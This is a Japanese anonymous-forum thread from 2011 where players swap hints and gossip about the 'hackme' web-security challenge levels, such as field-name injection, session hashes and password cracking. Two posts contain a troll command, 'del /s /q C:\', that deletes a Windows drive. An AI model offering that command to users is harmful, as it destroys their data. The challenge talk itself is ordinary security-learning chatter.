495 :名無しさん@お腹いっぱい:2011/02/26(土) 12:29:41.91
管理者権限でやるのは当たり前
496 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:30:06.74
起動方法知ってるならその意味もわかるだろ・・・
administratorですか?
498 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:30:41.31
>>492 だれうまw
499 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:31:02.17
500 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:31:38.15
HTTPヘッダインジェクションは結構試したんだけどなぁ・・・
またlv4みたいな感じか?
一字一句間違えちゃいけませぬ。
またlv4みたいな感じか?
一字一句間違えちゃいけませぬ。
すべてのプログラムのアクセサリの中ですよね。
502 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:35:44.54
>>487
だから、具体的に。
だから、具体的に。
503 :名無しさん@お腹いっぱい:2011/02/26(土) 12:36:24.90
それだ。
早くしないと、ネタバレで、問題変わるぞ
早くしないと、ネタバレで、問題変わるぞ
504 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:40:25.49
Lv3をおしえてー
505 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:40:47.20
506 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:43:35.23
LV4は「一字一句間違えずに」ではなくなったよ。
javascriptの文法無視して適当な単語が順番通りに並んでいたら受理するようになった。
javascriptの文法無視して適当な単語が順番通りに並んでいたら受理するようになった。
507 :名無しさん@お腹いっぱい。:2011/02/26(土) 12:55:51.36
これ通過した時の時間も記録されればよかったのにな
最初のうちに自力で解いた奴のとネタバレ見て手順だけ辿った奴が
同じランク扱いとかちょっと不公平すぎる
最初のうちに自力で解いた奴のとネタバレ見て手順だけ辿った奴が
同じランク扱いとかちょっと不公平すぎる
508 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:00:46.07
それやるとデータが大きくなるからやらないって中の人が言ってた
509 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:03:28.29
510 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:06:08.19
511 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:06:14.37
>>javascriptの文法無視して適当な単語が順番通りに並んでいたら受理するようになった。
あれ判定基準そんなに変わってたのか
あれ判定基準そんなに変わってたのか
512 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:12:54.53
>>510
出来たら・・・そこで・・・おしまい・・・? ごめん混乱してきた。
出来たら・・・そこで・・・おしまい・・・? ごめん混乱してきた。
513 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:24:52.42
>>512
成功できたら名前載ってるだろう。
成功できたら名前載ってるだろう。
514 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:28:42.62
LV4みたいに段階があるかもしれないんじゃないの?
515 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:43:11.93
xssと同じで相手がアクセスすることをどう想定するかの発想か?
516 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:44:34.11
Level6はsessionidに使われているmd5とsha1の組み合わせの解析
517 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:45:10.62
「500万円が当選しました!
こちらをクリックしてください。」
ってメールばら撒けはいいんじゃね?w
こちらをクリックしてください。」
ってメールばら撒けはいいんじゃね?w
518 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:50:26.43
クリア数思ったより伸びないな、Lv3はもう1000人超えてると思ってた
昨日の昼の時点でLv4が100人くらい、Lv3で600くらいだったはず
L4とL3の比率見てると、手法はあってるけど判定基準ではねられたってのが結構いたんだな
昨日の昼の時点でLv4が100人くらい、Lv3で600くらいだったはず
L4とL3の比率見てると、手法はあってるけど判定基準ではねられたってのが結構いたんだな
519 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:50:39.43
>>517
誰にばら撒くんだよwww
誰にばら撒くんだよwww
520 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:57:35.45
>>518
そもそもそんなに参加者いないんじゃないか?
そもそもそんなに参加者いないんじゃないか?
521 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:57:37.11
>>516
ソルトとか使われてるから無理なんじゃね?
ソルトとか使われてるから無理なんじゃね?
del /s /q C:\って打ったら、
「Operation System Not Found」ってなって起動しなくなったんですけど…。
「Operation System Not Found」ってなって起動しなくなったんですけど…。
523 :名無しさん@お腹いっぱい。:2011/02/26(土) 13:58:44.59
>>520
Lv1で挫折した人、Lv2で挫折した人、飽きて止めた人が大半と予想。
Lv1で挫折した人、Lv2で挫折した人、飽きて止めた人が大半と予想。
del /s /q C:\って打ったら、
「Operation System Not Found」ってなって起動しなくなったんですけど…。
「Operation System Not Found」ってなって起動しなくなったんですけど…。
525 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:02:57.95
はいはいワロスワロス
526 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:03:08.29
>>522
Windowsはお前に愛想を尽かして出て行ったのです。
Linux族になればdel程度は許容してくれるのです。
今すぐこれを買うのです。
ttp://www.amazon.co.jp/ubuntu-Linux%E5%85%A5%E9%96%80%E3%82%AD%E3%83%83%E3%83%88-INTRODUCTION-KIT-%E5%B0%8F%E6%9E%97/dp/4798013749/uso-800nya
Windowsはお前に愛想を尽かして出て行ったのです。
Linux族になればdel程度は許容してくれるのです。
今すぐこれを買うのです。
ttp://www.amazon.co.jp/ubuntu-Linux%E5%85%A5%E9%96%80%E3%82%AD%E3%83%83%E3%83%88-INTRODUCTION-KIT-%E5%B0%8F%E6%9E%97/dp/4798013749/uso-800nya
527 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:13:23.25
>>526
小林サンチーッスwwwwwwwww宣伝必死wwwwwwwwざまあwww
小林サンチーッスwwwwwwwww宣伝必死wwwwwwwwざまあwww
528 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:27:05.22
529 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:27:52.94
linux無料だろwww
530 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:30:57.76
>>529
ハ?
ハ?
531 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:36:27.94
全然関係ないかも知れないけど、自分のランク確認できるページあるじゃない?
↓これ
http://hackme.netfire.jp/user/XXX
このページって、上記で XXX になっている部分に自分のIDが入るけど、適当に YYY とかに
書き換えてもちゃんと表示されるんだよね。
クッキーのセッションIDだけを見ているみたいでURLは関係ない。
↓これ
http://hackme.netfire.jp/user/XXX
このページって、上記で XXX になっている部分に自分のIDが入るけど、適当に YYY とかに
書き換えてもちゃんと表示されるんだよね。
クッキーのセッションIDだけを見ているみたいでURLは関係ない。
532 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:42:24.77
現Lv5クリアのdotdisterが実は実在してなくて
ツイッターやなんかも全部中の人の仕掛け。
そしてこのdotdisterからいかにして情報を抜くかが今回の肝なのだ、と!!!!
ツイッターやなんかも全部中の人の仕掛け。
そしてこのdotdisterからいかにして情報を抜くかが今回の肝なのだ、と!!!!
533 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:49:09.35
Lv5で任意の文字列を埋め込めた
あとはデータ抽出か認証回避のコードを考えるんだろうけどやる気が出ない
だれかやっといて
あとはデータ抽出か認証回避のコードを考えるんだろうけどやる気が出ない
だれかやっといて
534 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:53:11.75
>>533
わかったやっとくから引き継ぎ資料よろしく
わかったやっとくから引き継ぎ資料よろしく
535 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:53:27.70
>>533
How to?
How to?
536 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:56:03.91
築地本願寺のサイトもLv1と同じ方法で
ハックできるのか、、、
ハックできるのか、、、
537 :名無しさん@お腹いっぱい。:2011/02/26(土) 14:57:08.35
firebugかdragonflyでフォームの送信データ名を変更してpostすれば
送信データ名をエラーの一部として吐く
送信データ名として任意の文字列を埋め込めるからそこにコード書けばいいはず
送信データ名をエラーの一部として吐く
送信データ名として任意の文字列を埋め込めるからそこにコード書けばいいはず
538 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:00:22.62
dotdisterは北大生だろ。twitterで名前まで晒しているし、本物。
539 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:01:36.77
>>537
超ネタバレじゃねぇか。今日中にクリアできそう
超ネタバレじゃねぇか。今日中にクリアできそう
540 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:05:57.13
>>536
<!--
南無阿弥陀仏
南無阿弥陀仏
/ ̄ ̄ ̄\
| |
| | _
| ^ ^ ) ///ト、
( >ノ(_)Y ////)|
∧丶i-=ニ=|| ||
/\\\  ̄ノ| ノノ
/ \\  ̄ / / |
築地本願寺にようこそ、ようこそ
-->
wwwwwww
<!--
南無阿弥陀仏
南無阿弥陀仏
/ ̄ ̄ ̄\
| |
| | _
| ^ ^ ) ///ト、
( >ノ(_)Y ////)|
∧丶i-=ニ=|| ||
/\\\  ̄ノ| ノノ
/ \\  ̄ / / |
築地本願寺にようこそ、ようこそ
-->
wwwwwww
541 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:07:46.01
>>537
それ前スレでもでてたけど、どのレベルでもできるよ
それ前スレでもでてたけど、どのレベルでもできるよ
542 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:14:09.91
ここにコードを埋めても、自分以外には見えないから意味ないよなー。
543 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:15:12.28
544 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:19:16.52
非ASCII送ると ef bf bd に置き換えられるんだけど、これ何ヒントになる?
545 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:19:46.01
546 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:23:32.46
547 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:27:57.77
548 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:28:22.29
自己解決
なんだ/Lv5/だと出ないのに(ry
よくわからん仕様だな
なんだ/Lv5/だと出ないのに(ry
よくわからん仕様だな
549 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:29:38.11
これやっても見えるのは自分だけだしな
550 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:40:31.71
君の例がname=unkoで俺の実装がname=mankoだった
泣けた
泣けた
551 :名無しさん@お腹いっぱい。:2011/02/26(土) 15:41:53.89
>>550
アホすwww
アホすwww
552 :名無しさん@お腹いっぱい。:2011/02/26(土) 16:00:06.80
お前ら
文字を与えてくださいってエラーでた?
文字を与えてくださいってエラーでた?
553 :名無しさん@お腹いっぱい。:2011/02/26(土) 16:06:52.23
>>552
前スレでそんなこと言ってた人がいたな。
前スレでそんなこと言ってた人がいたな。
554 :名無しさん@お腹いっぱい。:2011/02/26(土) 16:07:54.97
>>552
出たけどそれがどうした?
出たけどそれがどうした?
555 :名無しさん@お腹いっぱい。:2011/02/26(土) 16:08:25.84
>>552
同じ名前のデータPOSTすればそのエラー出せた
同じ名前のデータPOSTすればそのエラー出せた
556 :名無しさん@お腹いっぱい。:2011/02/26(土) 16:41:06.92
おっと、ネタバレはそれぐらいにしといてくれよ
557 :名無しさん@お腹いっぱい。:2011/02/26(土) 16:51:32.75
これがネタバレだったら、まだひとりしか
クリアしてないってことはないんじゃ、、
なんか適切なサニタイズっぷりがガチエラーな気がする
クリアしてないってことはないんじゃ、、
なんか適切なサニタイズっぷりがガチエラーな気がする
558 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:02:08.50
12万いてクリアが一人とかどれだけおかしな問題なの?
セキュリティ記事書いてる連中はなにやってんの?
セキュリティ記事書いてる連中はなにやってんの?
559 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:07:20.38
http://hackme.netfire.jp/start
レベル5突破者が出たからかスタートページの背景がPWNedって書いてあるけどWとNが大文字なのはどういう意味?
レベル5突破者が出たからかスタートページの背景がPWNedって書いてあるけどWとNが大文字なのはどういう意味?
560 :sage:2011/02/26(土) 17:15:10.53
nameとpasswordのbyte数って5byteと13byteじゃね?
561 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:21:00.65
>>559
かっこいいって意味?
かっこいいって意味?
562 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:31:38.30
>>506
それもともと。
それもともと。
563 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:32:41.48
>>559
PWがpwnedしたみたいなふうにかけてる?
PWがpwnedしたみたいなふうにかけてる?
564 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:35:30.24
>>558
挑戦していない
挑戦していない
565 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:37:14.65
Pwned:ボコボコにされたの意
Pwn←元々はoneの打ち間違い
PWNed→一人にボコボコにされた
だったらおもろい
Pwn←元々はoneの打ち間違い
PWNed→一人にボコボコにされた
だったらおもろい
566 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:37:28.95
>>564
どう見てもしてるだろ
どう見てもしてるだろ
567 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:37:48.47
あと、パスワード設定しなくて
使えなくなったアカウントが6割混入と予想
俺も1個目のアカウントは使えなくなったし
使えなくなったアカウントが6割混入と予想
俺も1個目のアカウントは使えなくなったし
568 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:37:58.74
誰が挑戦してるの?
569 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:39:00.17
lv2,3,4やらにtwitterと同じ名前で登録してる人がちらほらいたほうだが…
570 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:39:59.12
571 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:40:11.64
>>567
再確認とかで、俺も10数個ミスってNoPassで登録しちゃったゼ!
再確認とかで、俺も10数個ミスってNoPassで登録しちゃったゼ!
572 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:40:27.30
>>567
再確認とかで、俺も10数個ミスってNoPassで登録しちゃったゼ!
再確認とかで、俺も10数個ミスってNoPassで登録しちゃったゼ!
573 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:42:52.84
>>569
まじか。記事書くような人がいるならtwitter探っとけばよかた。
まじか。記事書くような人がいるならtwitter探っとけばよかた。
574 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:43:42.22
575 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:47:09.31
>>573
lv4先行組みは皆twitterにhackmeのこと書き込んでた記憶がある
lv4先行組みは皆twitterにhackmeのこと書き込んでた記憶がある
576 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:48:53.53
>>575
いや、俺も名前載った一人だけど、セキュリティ関係の記事書いてる人がいたんでしょ?
いや、俺も名前載った一人だけど、セキュリティ関係の記事書いてる人がいたんでしょ?
577 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:52:44.25
セキュリティ関係者が興味なしとかだったらぶっちゃけ終わってると思う
578 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:52:48.67
twitterなら”hackmeから403喰らって冷静になった(キリッ”って奴が居たぞw
579 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:54:04.34
もしおまいらが人事で「hackmeをlv4まで独力でクリアしました!採用して下さい!」とか言う奴がいたら採用する?
580 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:54:32.24
581 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:55:14.91
>>579
却下するにきまってんだろwww
却下するにきまってんだろwww
582 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:55:43.38
>>581
えっ、なんで!?
えっ、なんで!?
583 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:56:12.75
lv5は一人だからfireNetからスカウトとかありそう
584 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:56:44.20
>>579
会社なら、脆弱性が含まれていないか調査する会社に依頼しちゃうことがおおいかなぁ
会社なら、脆弱性が含まれていないか調査する会社に依頼しちゃうことがおおいかなぁ
585 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:57:47.09
そのセキュリティ調査会社はなにをやってる!
はやくLv5をがんばれよ!
はやくLv5をがんばれよ!
586 :名無しさん@お腹いっぱい。:2011/02/26(土) 17:59:17.14
金出して依頼すればいい。思ったより高いから気をつけてな
587 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:01:24.36
そもそも外部サイトへの調査依頼なんて受けるわけないだろ
588 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:01:35.38
調査つっても自社ソフト()かけるだけだもんなー
ザルだからあまり意味がない
googleやらhatenaやらあれこれ穴が見つかってるを考えればすぐにわかるわな
ザルだからあまり意味がない
googleやらhatenaやらあれこれ穴が見つかってるを考えればすぐにわかるわな
589 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:02:26.99
590 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:04:32.76
Lv4も一字一句だなんだとうるさいのがたくさんいたけど、そんなことはなく、40文字ぐらいでいけるよね
591 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:04:33.36
>>582
ゲームと実務にゃ大きい壁があるんだよ
ゲームと実務にゃ大きい壁があるんだよ
592 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:06:32.77
ゲームの方が穴は小さいから超上級
実務は穴が大きいから超初級って事か…
実務は穴が大きいから超初級って事か…
593 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:10:38.67
>>578
ブルートフォースないって言われてるのに・・・
ブルートフォースないって言われてるのに・・・
594 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:13:30.53
netfireに踊らされてるだけだからなあ
595 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:14:30.18
Lv5で../にアクセスしたら
1回目はLv5に転送された
2回目はLv1に転送された
ブラウザのキャッシュかなんかなのかなあ
1回目はLv5に転送された
2回目はLv1に転送された
ブラウザのキャッシュかなんかなのかなあ
596 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:19:01.57
597 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:27:48.00
>>595
墓穴掘ったなww
墓穴掘ったなww
598 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:32:17.73
ディレクトリトラバーサルだと思った>>595
m9(^Д^)プギャー
m9(^Д^)プギャー
599 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:33:16.08
Hackmeの四皇の一人、yoshimura_yuuから重要なお知らせがあります。
ttp://twitter.com/yoshimura_yuu/status/41388949205303296
みなさんも気をつけましょう。
ttp://twitter.com/yoshimura_yuu/status/41388949205303296
みなさんも気をつけましょう。
600 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:35:50.04
>>598
ディレクトリトラバーサルをよくわかってない人キター
ディレクトリトラバーサルをよくわかってない人キター
601 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:37:08.55
602 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:40:22.17
twitterのプロフィールにセキュリティって書いてる人もっと頑張れよ
>>601
高校生で気づいたんだからまあOKだろう
もうLv5わからないから壊すことにした
https://addons.mozilla.org/en-us/firefox/addon/destroy-the-web/
高校生で気づいたんだからまあOKだろう
もうLv5わからないから壊すことにした
https://addons.mozilla.org/en-us/firefox/addon/destroy-the-web/
604 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:42:19.91
605 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:44:07.58
>>598
人を罵る暇があるなら勉強して出直せ
人を罵る暇があるなら勉強して出直せ
606 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:45:43.73
607 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:47:02.71
>>603
それやって何の意味があると
それやって何の意味があると
608 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:47:03.78
>>820のおかげでLV5できそう
609 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:49:03.15
>>608
時間軸を逸しているだと!?
時間軸を逸しているだと!?
610 :名無しさん@お腹いっぱい。:2011/02/26(土) 18:50:36.57
ドメイン失効狙いか、そいつは盲点だった
611 :名無しさん@お腹いっぱい。:2011/02/26(土) 19:43:55.74
最近は本当の意味でのゆとりが2ちゃんに来るようになったなぁ
よく解っていない奴が解った振りとか自演とか煽りとか日常茶飯事なのにな
IDが出ないと更に酷いから情報の取捨選択がかなり上手くないと騙されまくるだろう
よく解っていない奴が解った振りとか自演とか煽りとか日常茶飯事なのにな
IDが出ないと更に酷いから情報の取捨選択がかなり上手くないと騙されまくるだろう
612 :名無しさん@お腹いっぱい。:2011/02/26(土) 20:01:06.06
Twitterの方がミサワばりに吹いてるやついて酷いけどな・・・
613 :名無しさん@お腹いっぱい。:2011/02/26(土) 21:13:39.72
だいたい、見当がついた。
日曜過ぎてもできなかったら報告するから、
そのときは、みんなで罵倒しまくってくれ
日曜過ぎてもできなかったら報告するから、
そのときは、みんなで罵倒しまくってくれ
614 :名無しさん@お腹いっぱい。:2011/02/26(土) 21:50:05.30
>>608
何となく察しはついてたけど君はこの時間軸の人間じゃないね
何となく察しはついてたけど君はこの時間軸の人間じゃないね
615 :名無しさん@お腹いっぱい。:2011/02/26(土) 21:50:25.03
Lv5って何の攻撃したら変化見られる?
616 :名無しさん@お腹いっぱい。:2011/02/26(土) 21:51:43.33
>>615
名前はまだ無い
名前はまだ無い
617 :名無しさん@お腹いっぱい:2011/02/26(土) 21:59:10.95
(Lv5) dotdister 称号:ハッカー
(Lv4) 称号:仮免許ハッカー の人
総勢400人
(Lv3) 称号:ハッカーのたまご たち
総勢815人
(Lv4) 称号:仮免許ハッカー の人
総勢400人
(Lv3) 称号:ハッカーのたまご たち
総勢815人
618 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:02:55.01
619 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:07:48.84
未来にレスするのが最近のはやりなのか・・・。
620 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:09:53.21
>>618
つまんね
つまんね
621 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:13:45.61
どうでもいい・・・
622 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:14:26.75
>>582
それをアピールにするとか底が知れるわ
それをアピールにするとか底が知れるわ
623 :sage:2011/02/26(土) 22:20:25.91
john the ripperいれたらNortonが反応したぞ!同じ人いない?
624 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:29:59.83
>>623
出直してこい
出直してこい
625 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:30:25.57
626 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:32:33.65
Norton抜いてからこい
627 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:34:30.28
クラックツールにアンチウィルスが反応するのを当たり前だと思えないのがすごい
PCに入ってたら遮断するのは当たり前だろ トロイでもなんでもない
PCに入ってたら遮断するのは当たり前だろ トロイでもなんでもない
628 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:38:22.52
そもそもそんなのを騒ぐ奴がハックするなよ・・・
629 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:40:57.42
ウイルス対策ソフトなんか最初からいれてねーよ!
630 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:44:45.60
>>629
それはそれで結構な問題だろww
それはそれで結構な問題だろww
631 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:47:41.70
大丈夫だ、問題ない
632 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:48:46.82
vivirimeって感じだなw
633 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:52:30.24
にしても、一向にLv5のクリア者でねーな
634 :名無しさん@お腹いっぱい。:2011/02/26(土) 22:58:06.54
真のハッカーはアンチウイルスくらい自分で作る
他人が作ったものなんか信用できないのが普通だろう
他人が作ったものなんか信用できないのが普通だろう
635 :名無しさん@お腹いっぱい。:2011/02/26(土) 23:01:39.20
てか、ツイッターにつながらないんだがw
636 :名無しさん@お腹いっぱい。:2011/02/26(土) 23:15:46.53
TwitterがHackmeされたか
637 :名無しさん@お腹いっぱい。:2011/02/26(土) 23:38:38.78
Lv5はLoginの結果で入力された値を出力として使ってるところがなさそうだから
インジェクション関連は無いって考えは方向間違ってるかね?
インジェクション関連は無いって考えは方向間違ってるかね?
638 :名無しさん@お腹いっぱい。:2011/02/26(土) 23:43:44.37
もうあきたな
639 :名無しさん@お腹いっぱい:2011/02/26(土) 23:54:37.38
ほんとうにLV5クリアなのか?
お金やるから協力してくれとかじゃないの?
お金やるから協力してくれとかじゃないの?
640 :名無しさん@お腹いっぱい。:2011/02/27(日) 00:05:18.08
641 :名無しさん@お腹いっぱい。:2011/02/27(日) 00:08:17.44
なんでLv5だけ名前 称号の順なんだ?複数居たら変わるのかな
642 :名無しさん@お腹いっぱい。:2011/02/27(日) 00:17:49.56
該当者無しのままだと放置されるから、刺激するためのエサにしか見えないなぁ
643 :名無しさん@お腹いっぱい。:2011/02/27(日) 00:31:19.99
twitterの煽りからして餌かもな
これだけの人数がやって未だに一人とか妙な話
これだけの人数がやって未だに一人とか妙な話
644 :名無しさん@お腹いっぱい。:2011/02/27(日) 00:37:00.66
他レベルでクリアできてた人が全く出てこないで
lv4苦戦してた人があっさりというのも謎だね
lv4苦戦してた人があっさりというのも謎だね
645 :名無しさん@お腹いっぱい。:2011/02/27(日) 00:40:05.37
発想の問題っぽいな
646 :名無しさん@お腹いっぱい。:2011/02/27(日) 00:44:42.84
Nortonは反応するのか
カスペは無反応だな
カスペは無反応だな
647 :名無しさん@お腹いっぱい。:2011/02/27(日) 00:46:30.24
>>646
検出率を見かけだけでもあげたい奴は引っかかりまくるよ
検出率を見かけだけでもあげたい奴は引っかかりまくるよ
648 :名無しさん@お腹いっぱい。:2011/02/27(日) 02:50:25.58
とまった。
649 :名無しさん@お腹いっぱい。:2011/02/27(日) 03:10:31.89
lv5は諦めた
後は頼んだぞ
後は頼んだぞ
650 :名無しさん@お腹いっぱい。:2011/02/27(日) 03:29:51.55
それにしてもLv4クリア続出だな
ネタバレ厨は死ぬべき
ネタバレ厨は死ぬべき
651 :名無しさん@お腹いっぱい。:2011/02/27(日) 10:34:25.10
とか気づいたらLv5クリアした猛者がいるよ
賄賂?
賄賂?
652 :名無しさん@お腹いっぱい。:2011/02/27(日) 11:00:45.92
Lv5はパートナー契約を結ぶというソーシャルハック!?
653 :名無しさん@お腹いっぱい。:2011/02/27(日) 11:02:45.93
内定決まってる人にクリアさせて技術力アピール?w
654 :名無しさん@お腹いっぱい。:2011/02/27(日) 11:08:53.69
サポートにメールしたらIDとPASS送ってきた・・・
655 :名無しさん@お腹いっぱい。:2011/02/27(日) 11:08:58.98
陰謀論wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
656 :名無しさん@お腹いっぱい。:2011/02/27(日) 11:36:13.19
なんだここくそわろ
657 :名無しさん@お腹いっぱい。:2011/02/27(日) 11:56:37.04
ちょっとしたゲームなのに、陰謀論かww
せめて実装は内定者の課題くらいにしときたいな
せめて実装は内定者の課題くらいにしときたいな
658 :名無しさん@お腹いっぱい。:2011/02/27(日) 12:29:54.82
そろそろLv5の問題を変えてはどうかね?
659 :名無しさん@お腹いっぱい。:2011/02/27(日) 12:36:51.14
陰謀にかかるコストが少ないからねぇ。
やってもおかしくないでしょ。
やってもおかしくないでしょ。
660 :名無しさん@お腹いっぱい。:2011/02/27(日) 13:32:15.06
>>642-644
あいつのtwitter見たけど、北大生で学生同士の馴れ合いつぶやきばっかりダロ。本物だべ、ありゃ。
あいつのtwitter見たけど、北大生で学生同士の馴れ合いつぶやきばっかりダロ。本物だべ、ありゃ。
661 :名無しさん@お腹いっぱい。:2011/02/27(日) 13:36:35.73
Lv1とかもう一度見てみると、「右クリックは禁止です(笑)」とか出るのな。
馬鹿フィルターを入れたらしい。
馬鹿フィルターを入れたらしい。
662 :名無しさん@お腹いっぱい。:2011/02/27(日) 13:37:01.14
あんな中学生レベルの知識をひけらかすのが好きな痛い奴が通るんだから
セキュリティの知識が関係ない盲点だろうな。
ネタがわかったら非難轟々の予感。
セキュリティの知識が関係ない盲点だろうな。
ネタがわかったら非難轟々の予感。
663 :名無しさん@お腹いっぱい。:2011/02/27(日) 13:52:24.90
lv4の二の舞ならまだしも、予測も外して2月までにlv5クリアした奴でないと
セキュ板民ってw、てなるからな
まあ、文字だけの存在だから関係ないが
セキュ板民ってw、てなるからな
まあ、文字だけの存在だから関係ないが
664 :名無しさん@お腹いっぱい。:2011/02/27(日) 14:01:00.99
>>662
それがLV5はねーよwwwみたいになりそう
それがLV5はねーよwwwみたいになりそう
665 :名無しさん@お腹いっぱい。:2011/02/27(日) 14:11:12.07
うっかりツール廻したら403です。何日待てばいいのかな
666 :名無しさん@お腹いっぱい。:2011/02/27(日) 14:13:21.67
>>661
それ最初からな
それ最初からな
667 :名無しさん@お腹いっぱい。:2011/02/27(日) 14:15:00.43
>>665
何人も403喰らってるのに・・・
何人も403喰らってるのに・・・
668 :名無しさん@お腹いっぱい。:2011/02/27(日) 14:23:51.71
CTFのチームの人なら簡単に解けそうとか言ってるし
セミナーでやったCTFの内容に似たのがあったのかと推測
でもわからん・・・
セミナーでやったCTFの内容に似たのがあったのかと推測
でもわからん・・・
669 :名無しさん@お腹いっぱい。:2011/02/27(日) 14:52:03.09
CTFってびっくりするほど基礎的なことしかやってないのね・・。
こんなの自分で本を読めばいいのでは?
CTF参加を実績のように掲げてるバカを見たことあるんだがw
こんなの自分で本を読めばいいのでは?
CTF参加を実績のように掲げてるバカを見たことあるんだがw
670 :名無しさん@お腹いっぱい。:2011/02/27(日) 16:24:57.19
どうもFormEncodeに脆弱性があるというのは分かったが具体的な穴がわからん
671 :名無しさん@お腹いっぱい。:2011/02/27(日) 16:50:15.48
一気にかそったな
672 :名無しさん@お腹いっぱい。:2011/02/27(日) 16:54:43.18
UTF-7?
673 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:00:04.66
>>672
プラス記号どーすんだよw
プラス記号どーすんだよw
674 :名無しさん@お腹いっぱい。:2011/02/27(日) 18:00:25.54
MD5じゃないのか・・
john??二つファイル見れたけどどうやってぶっこむのよ
教えてエロい人
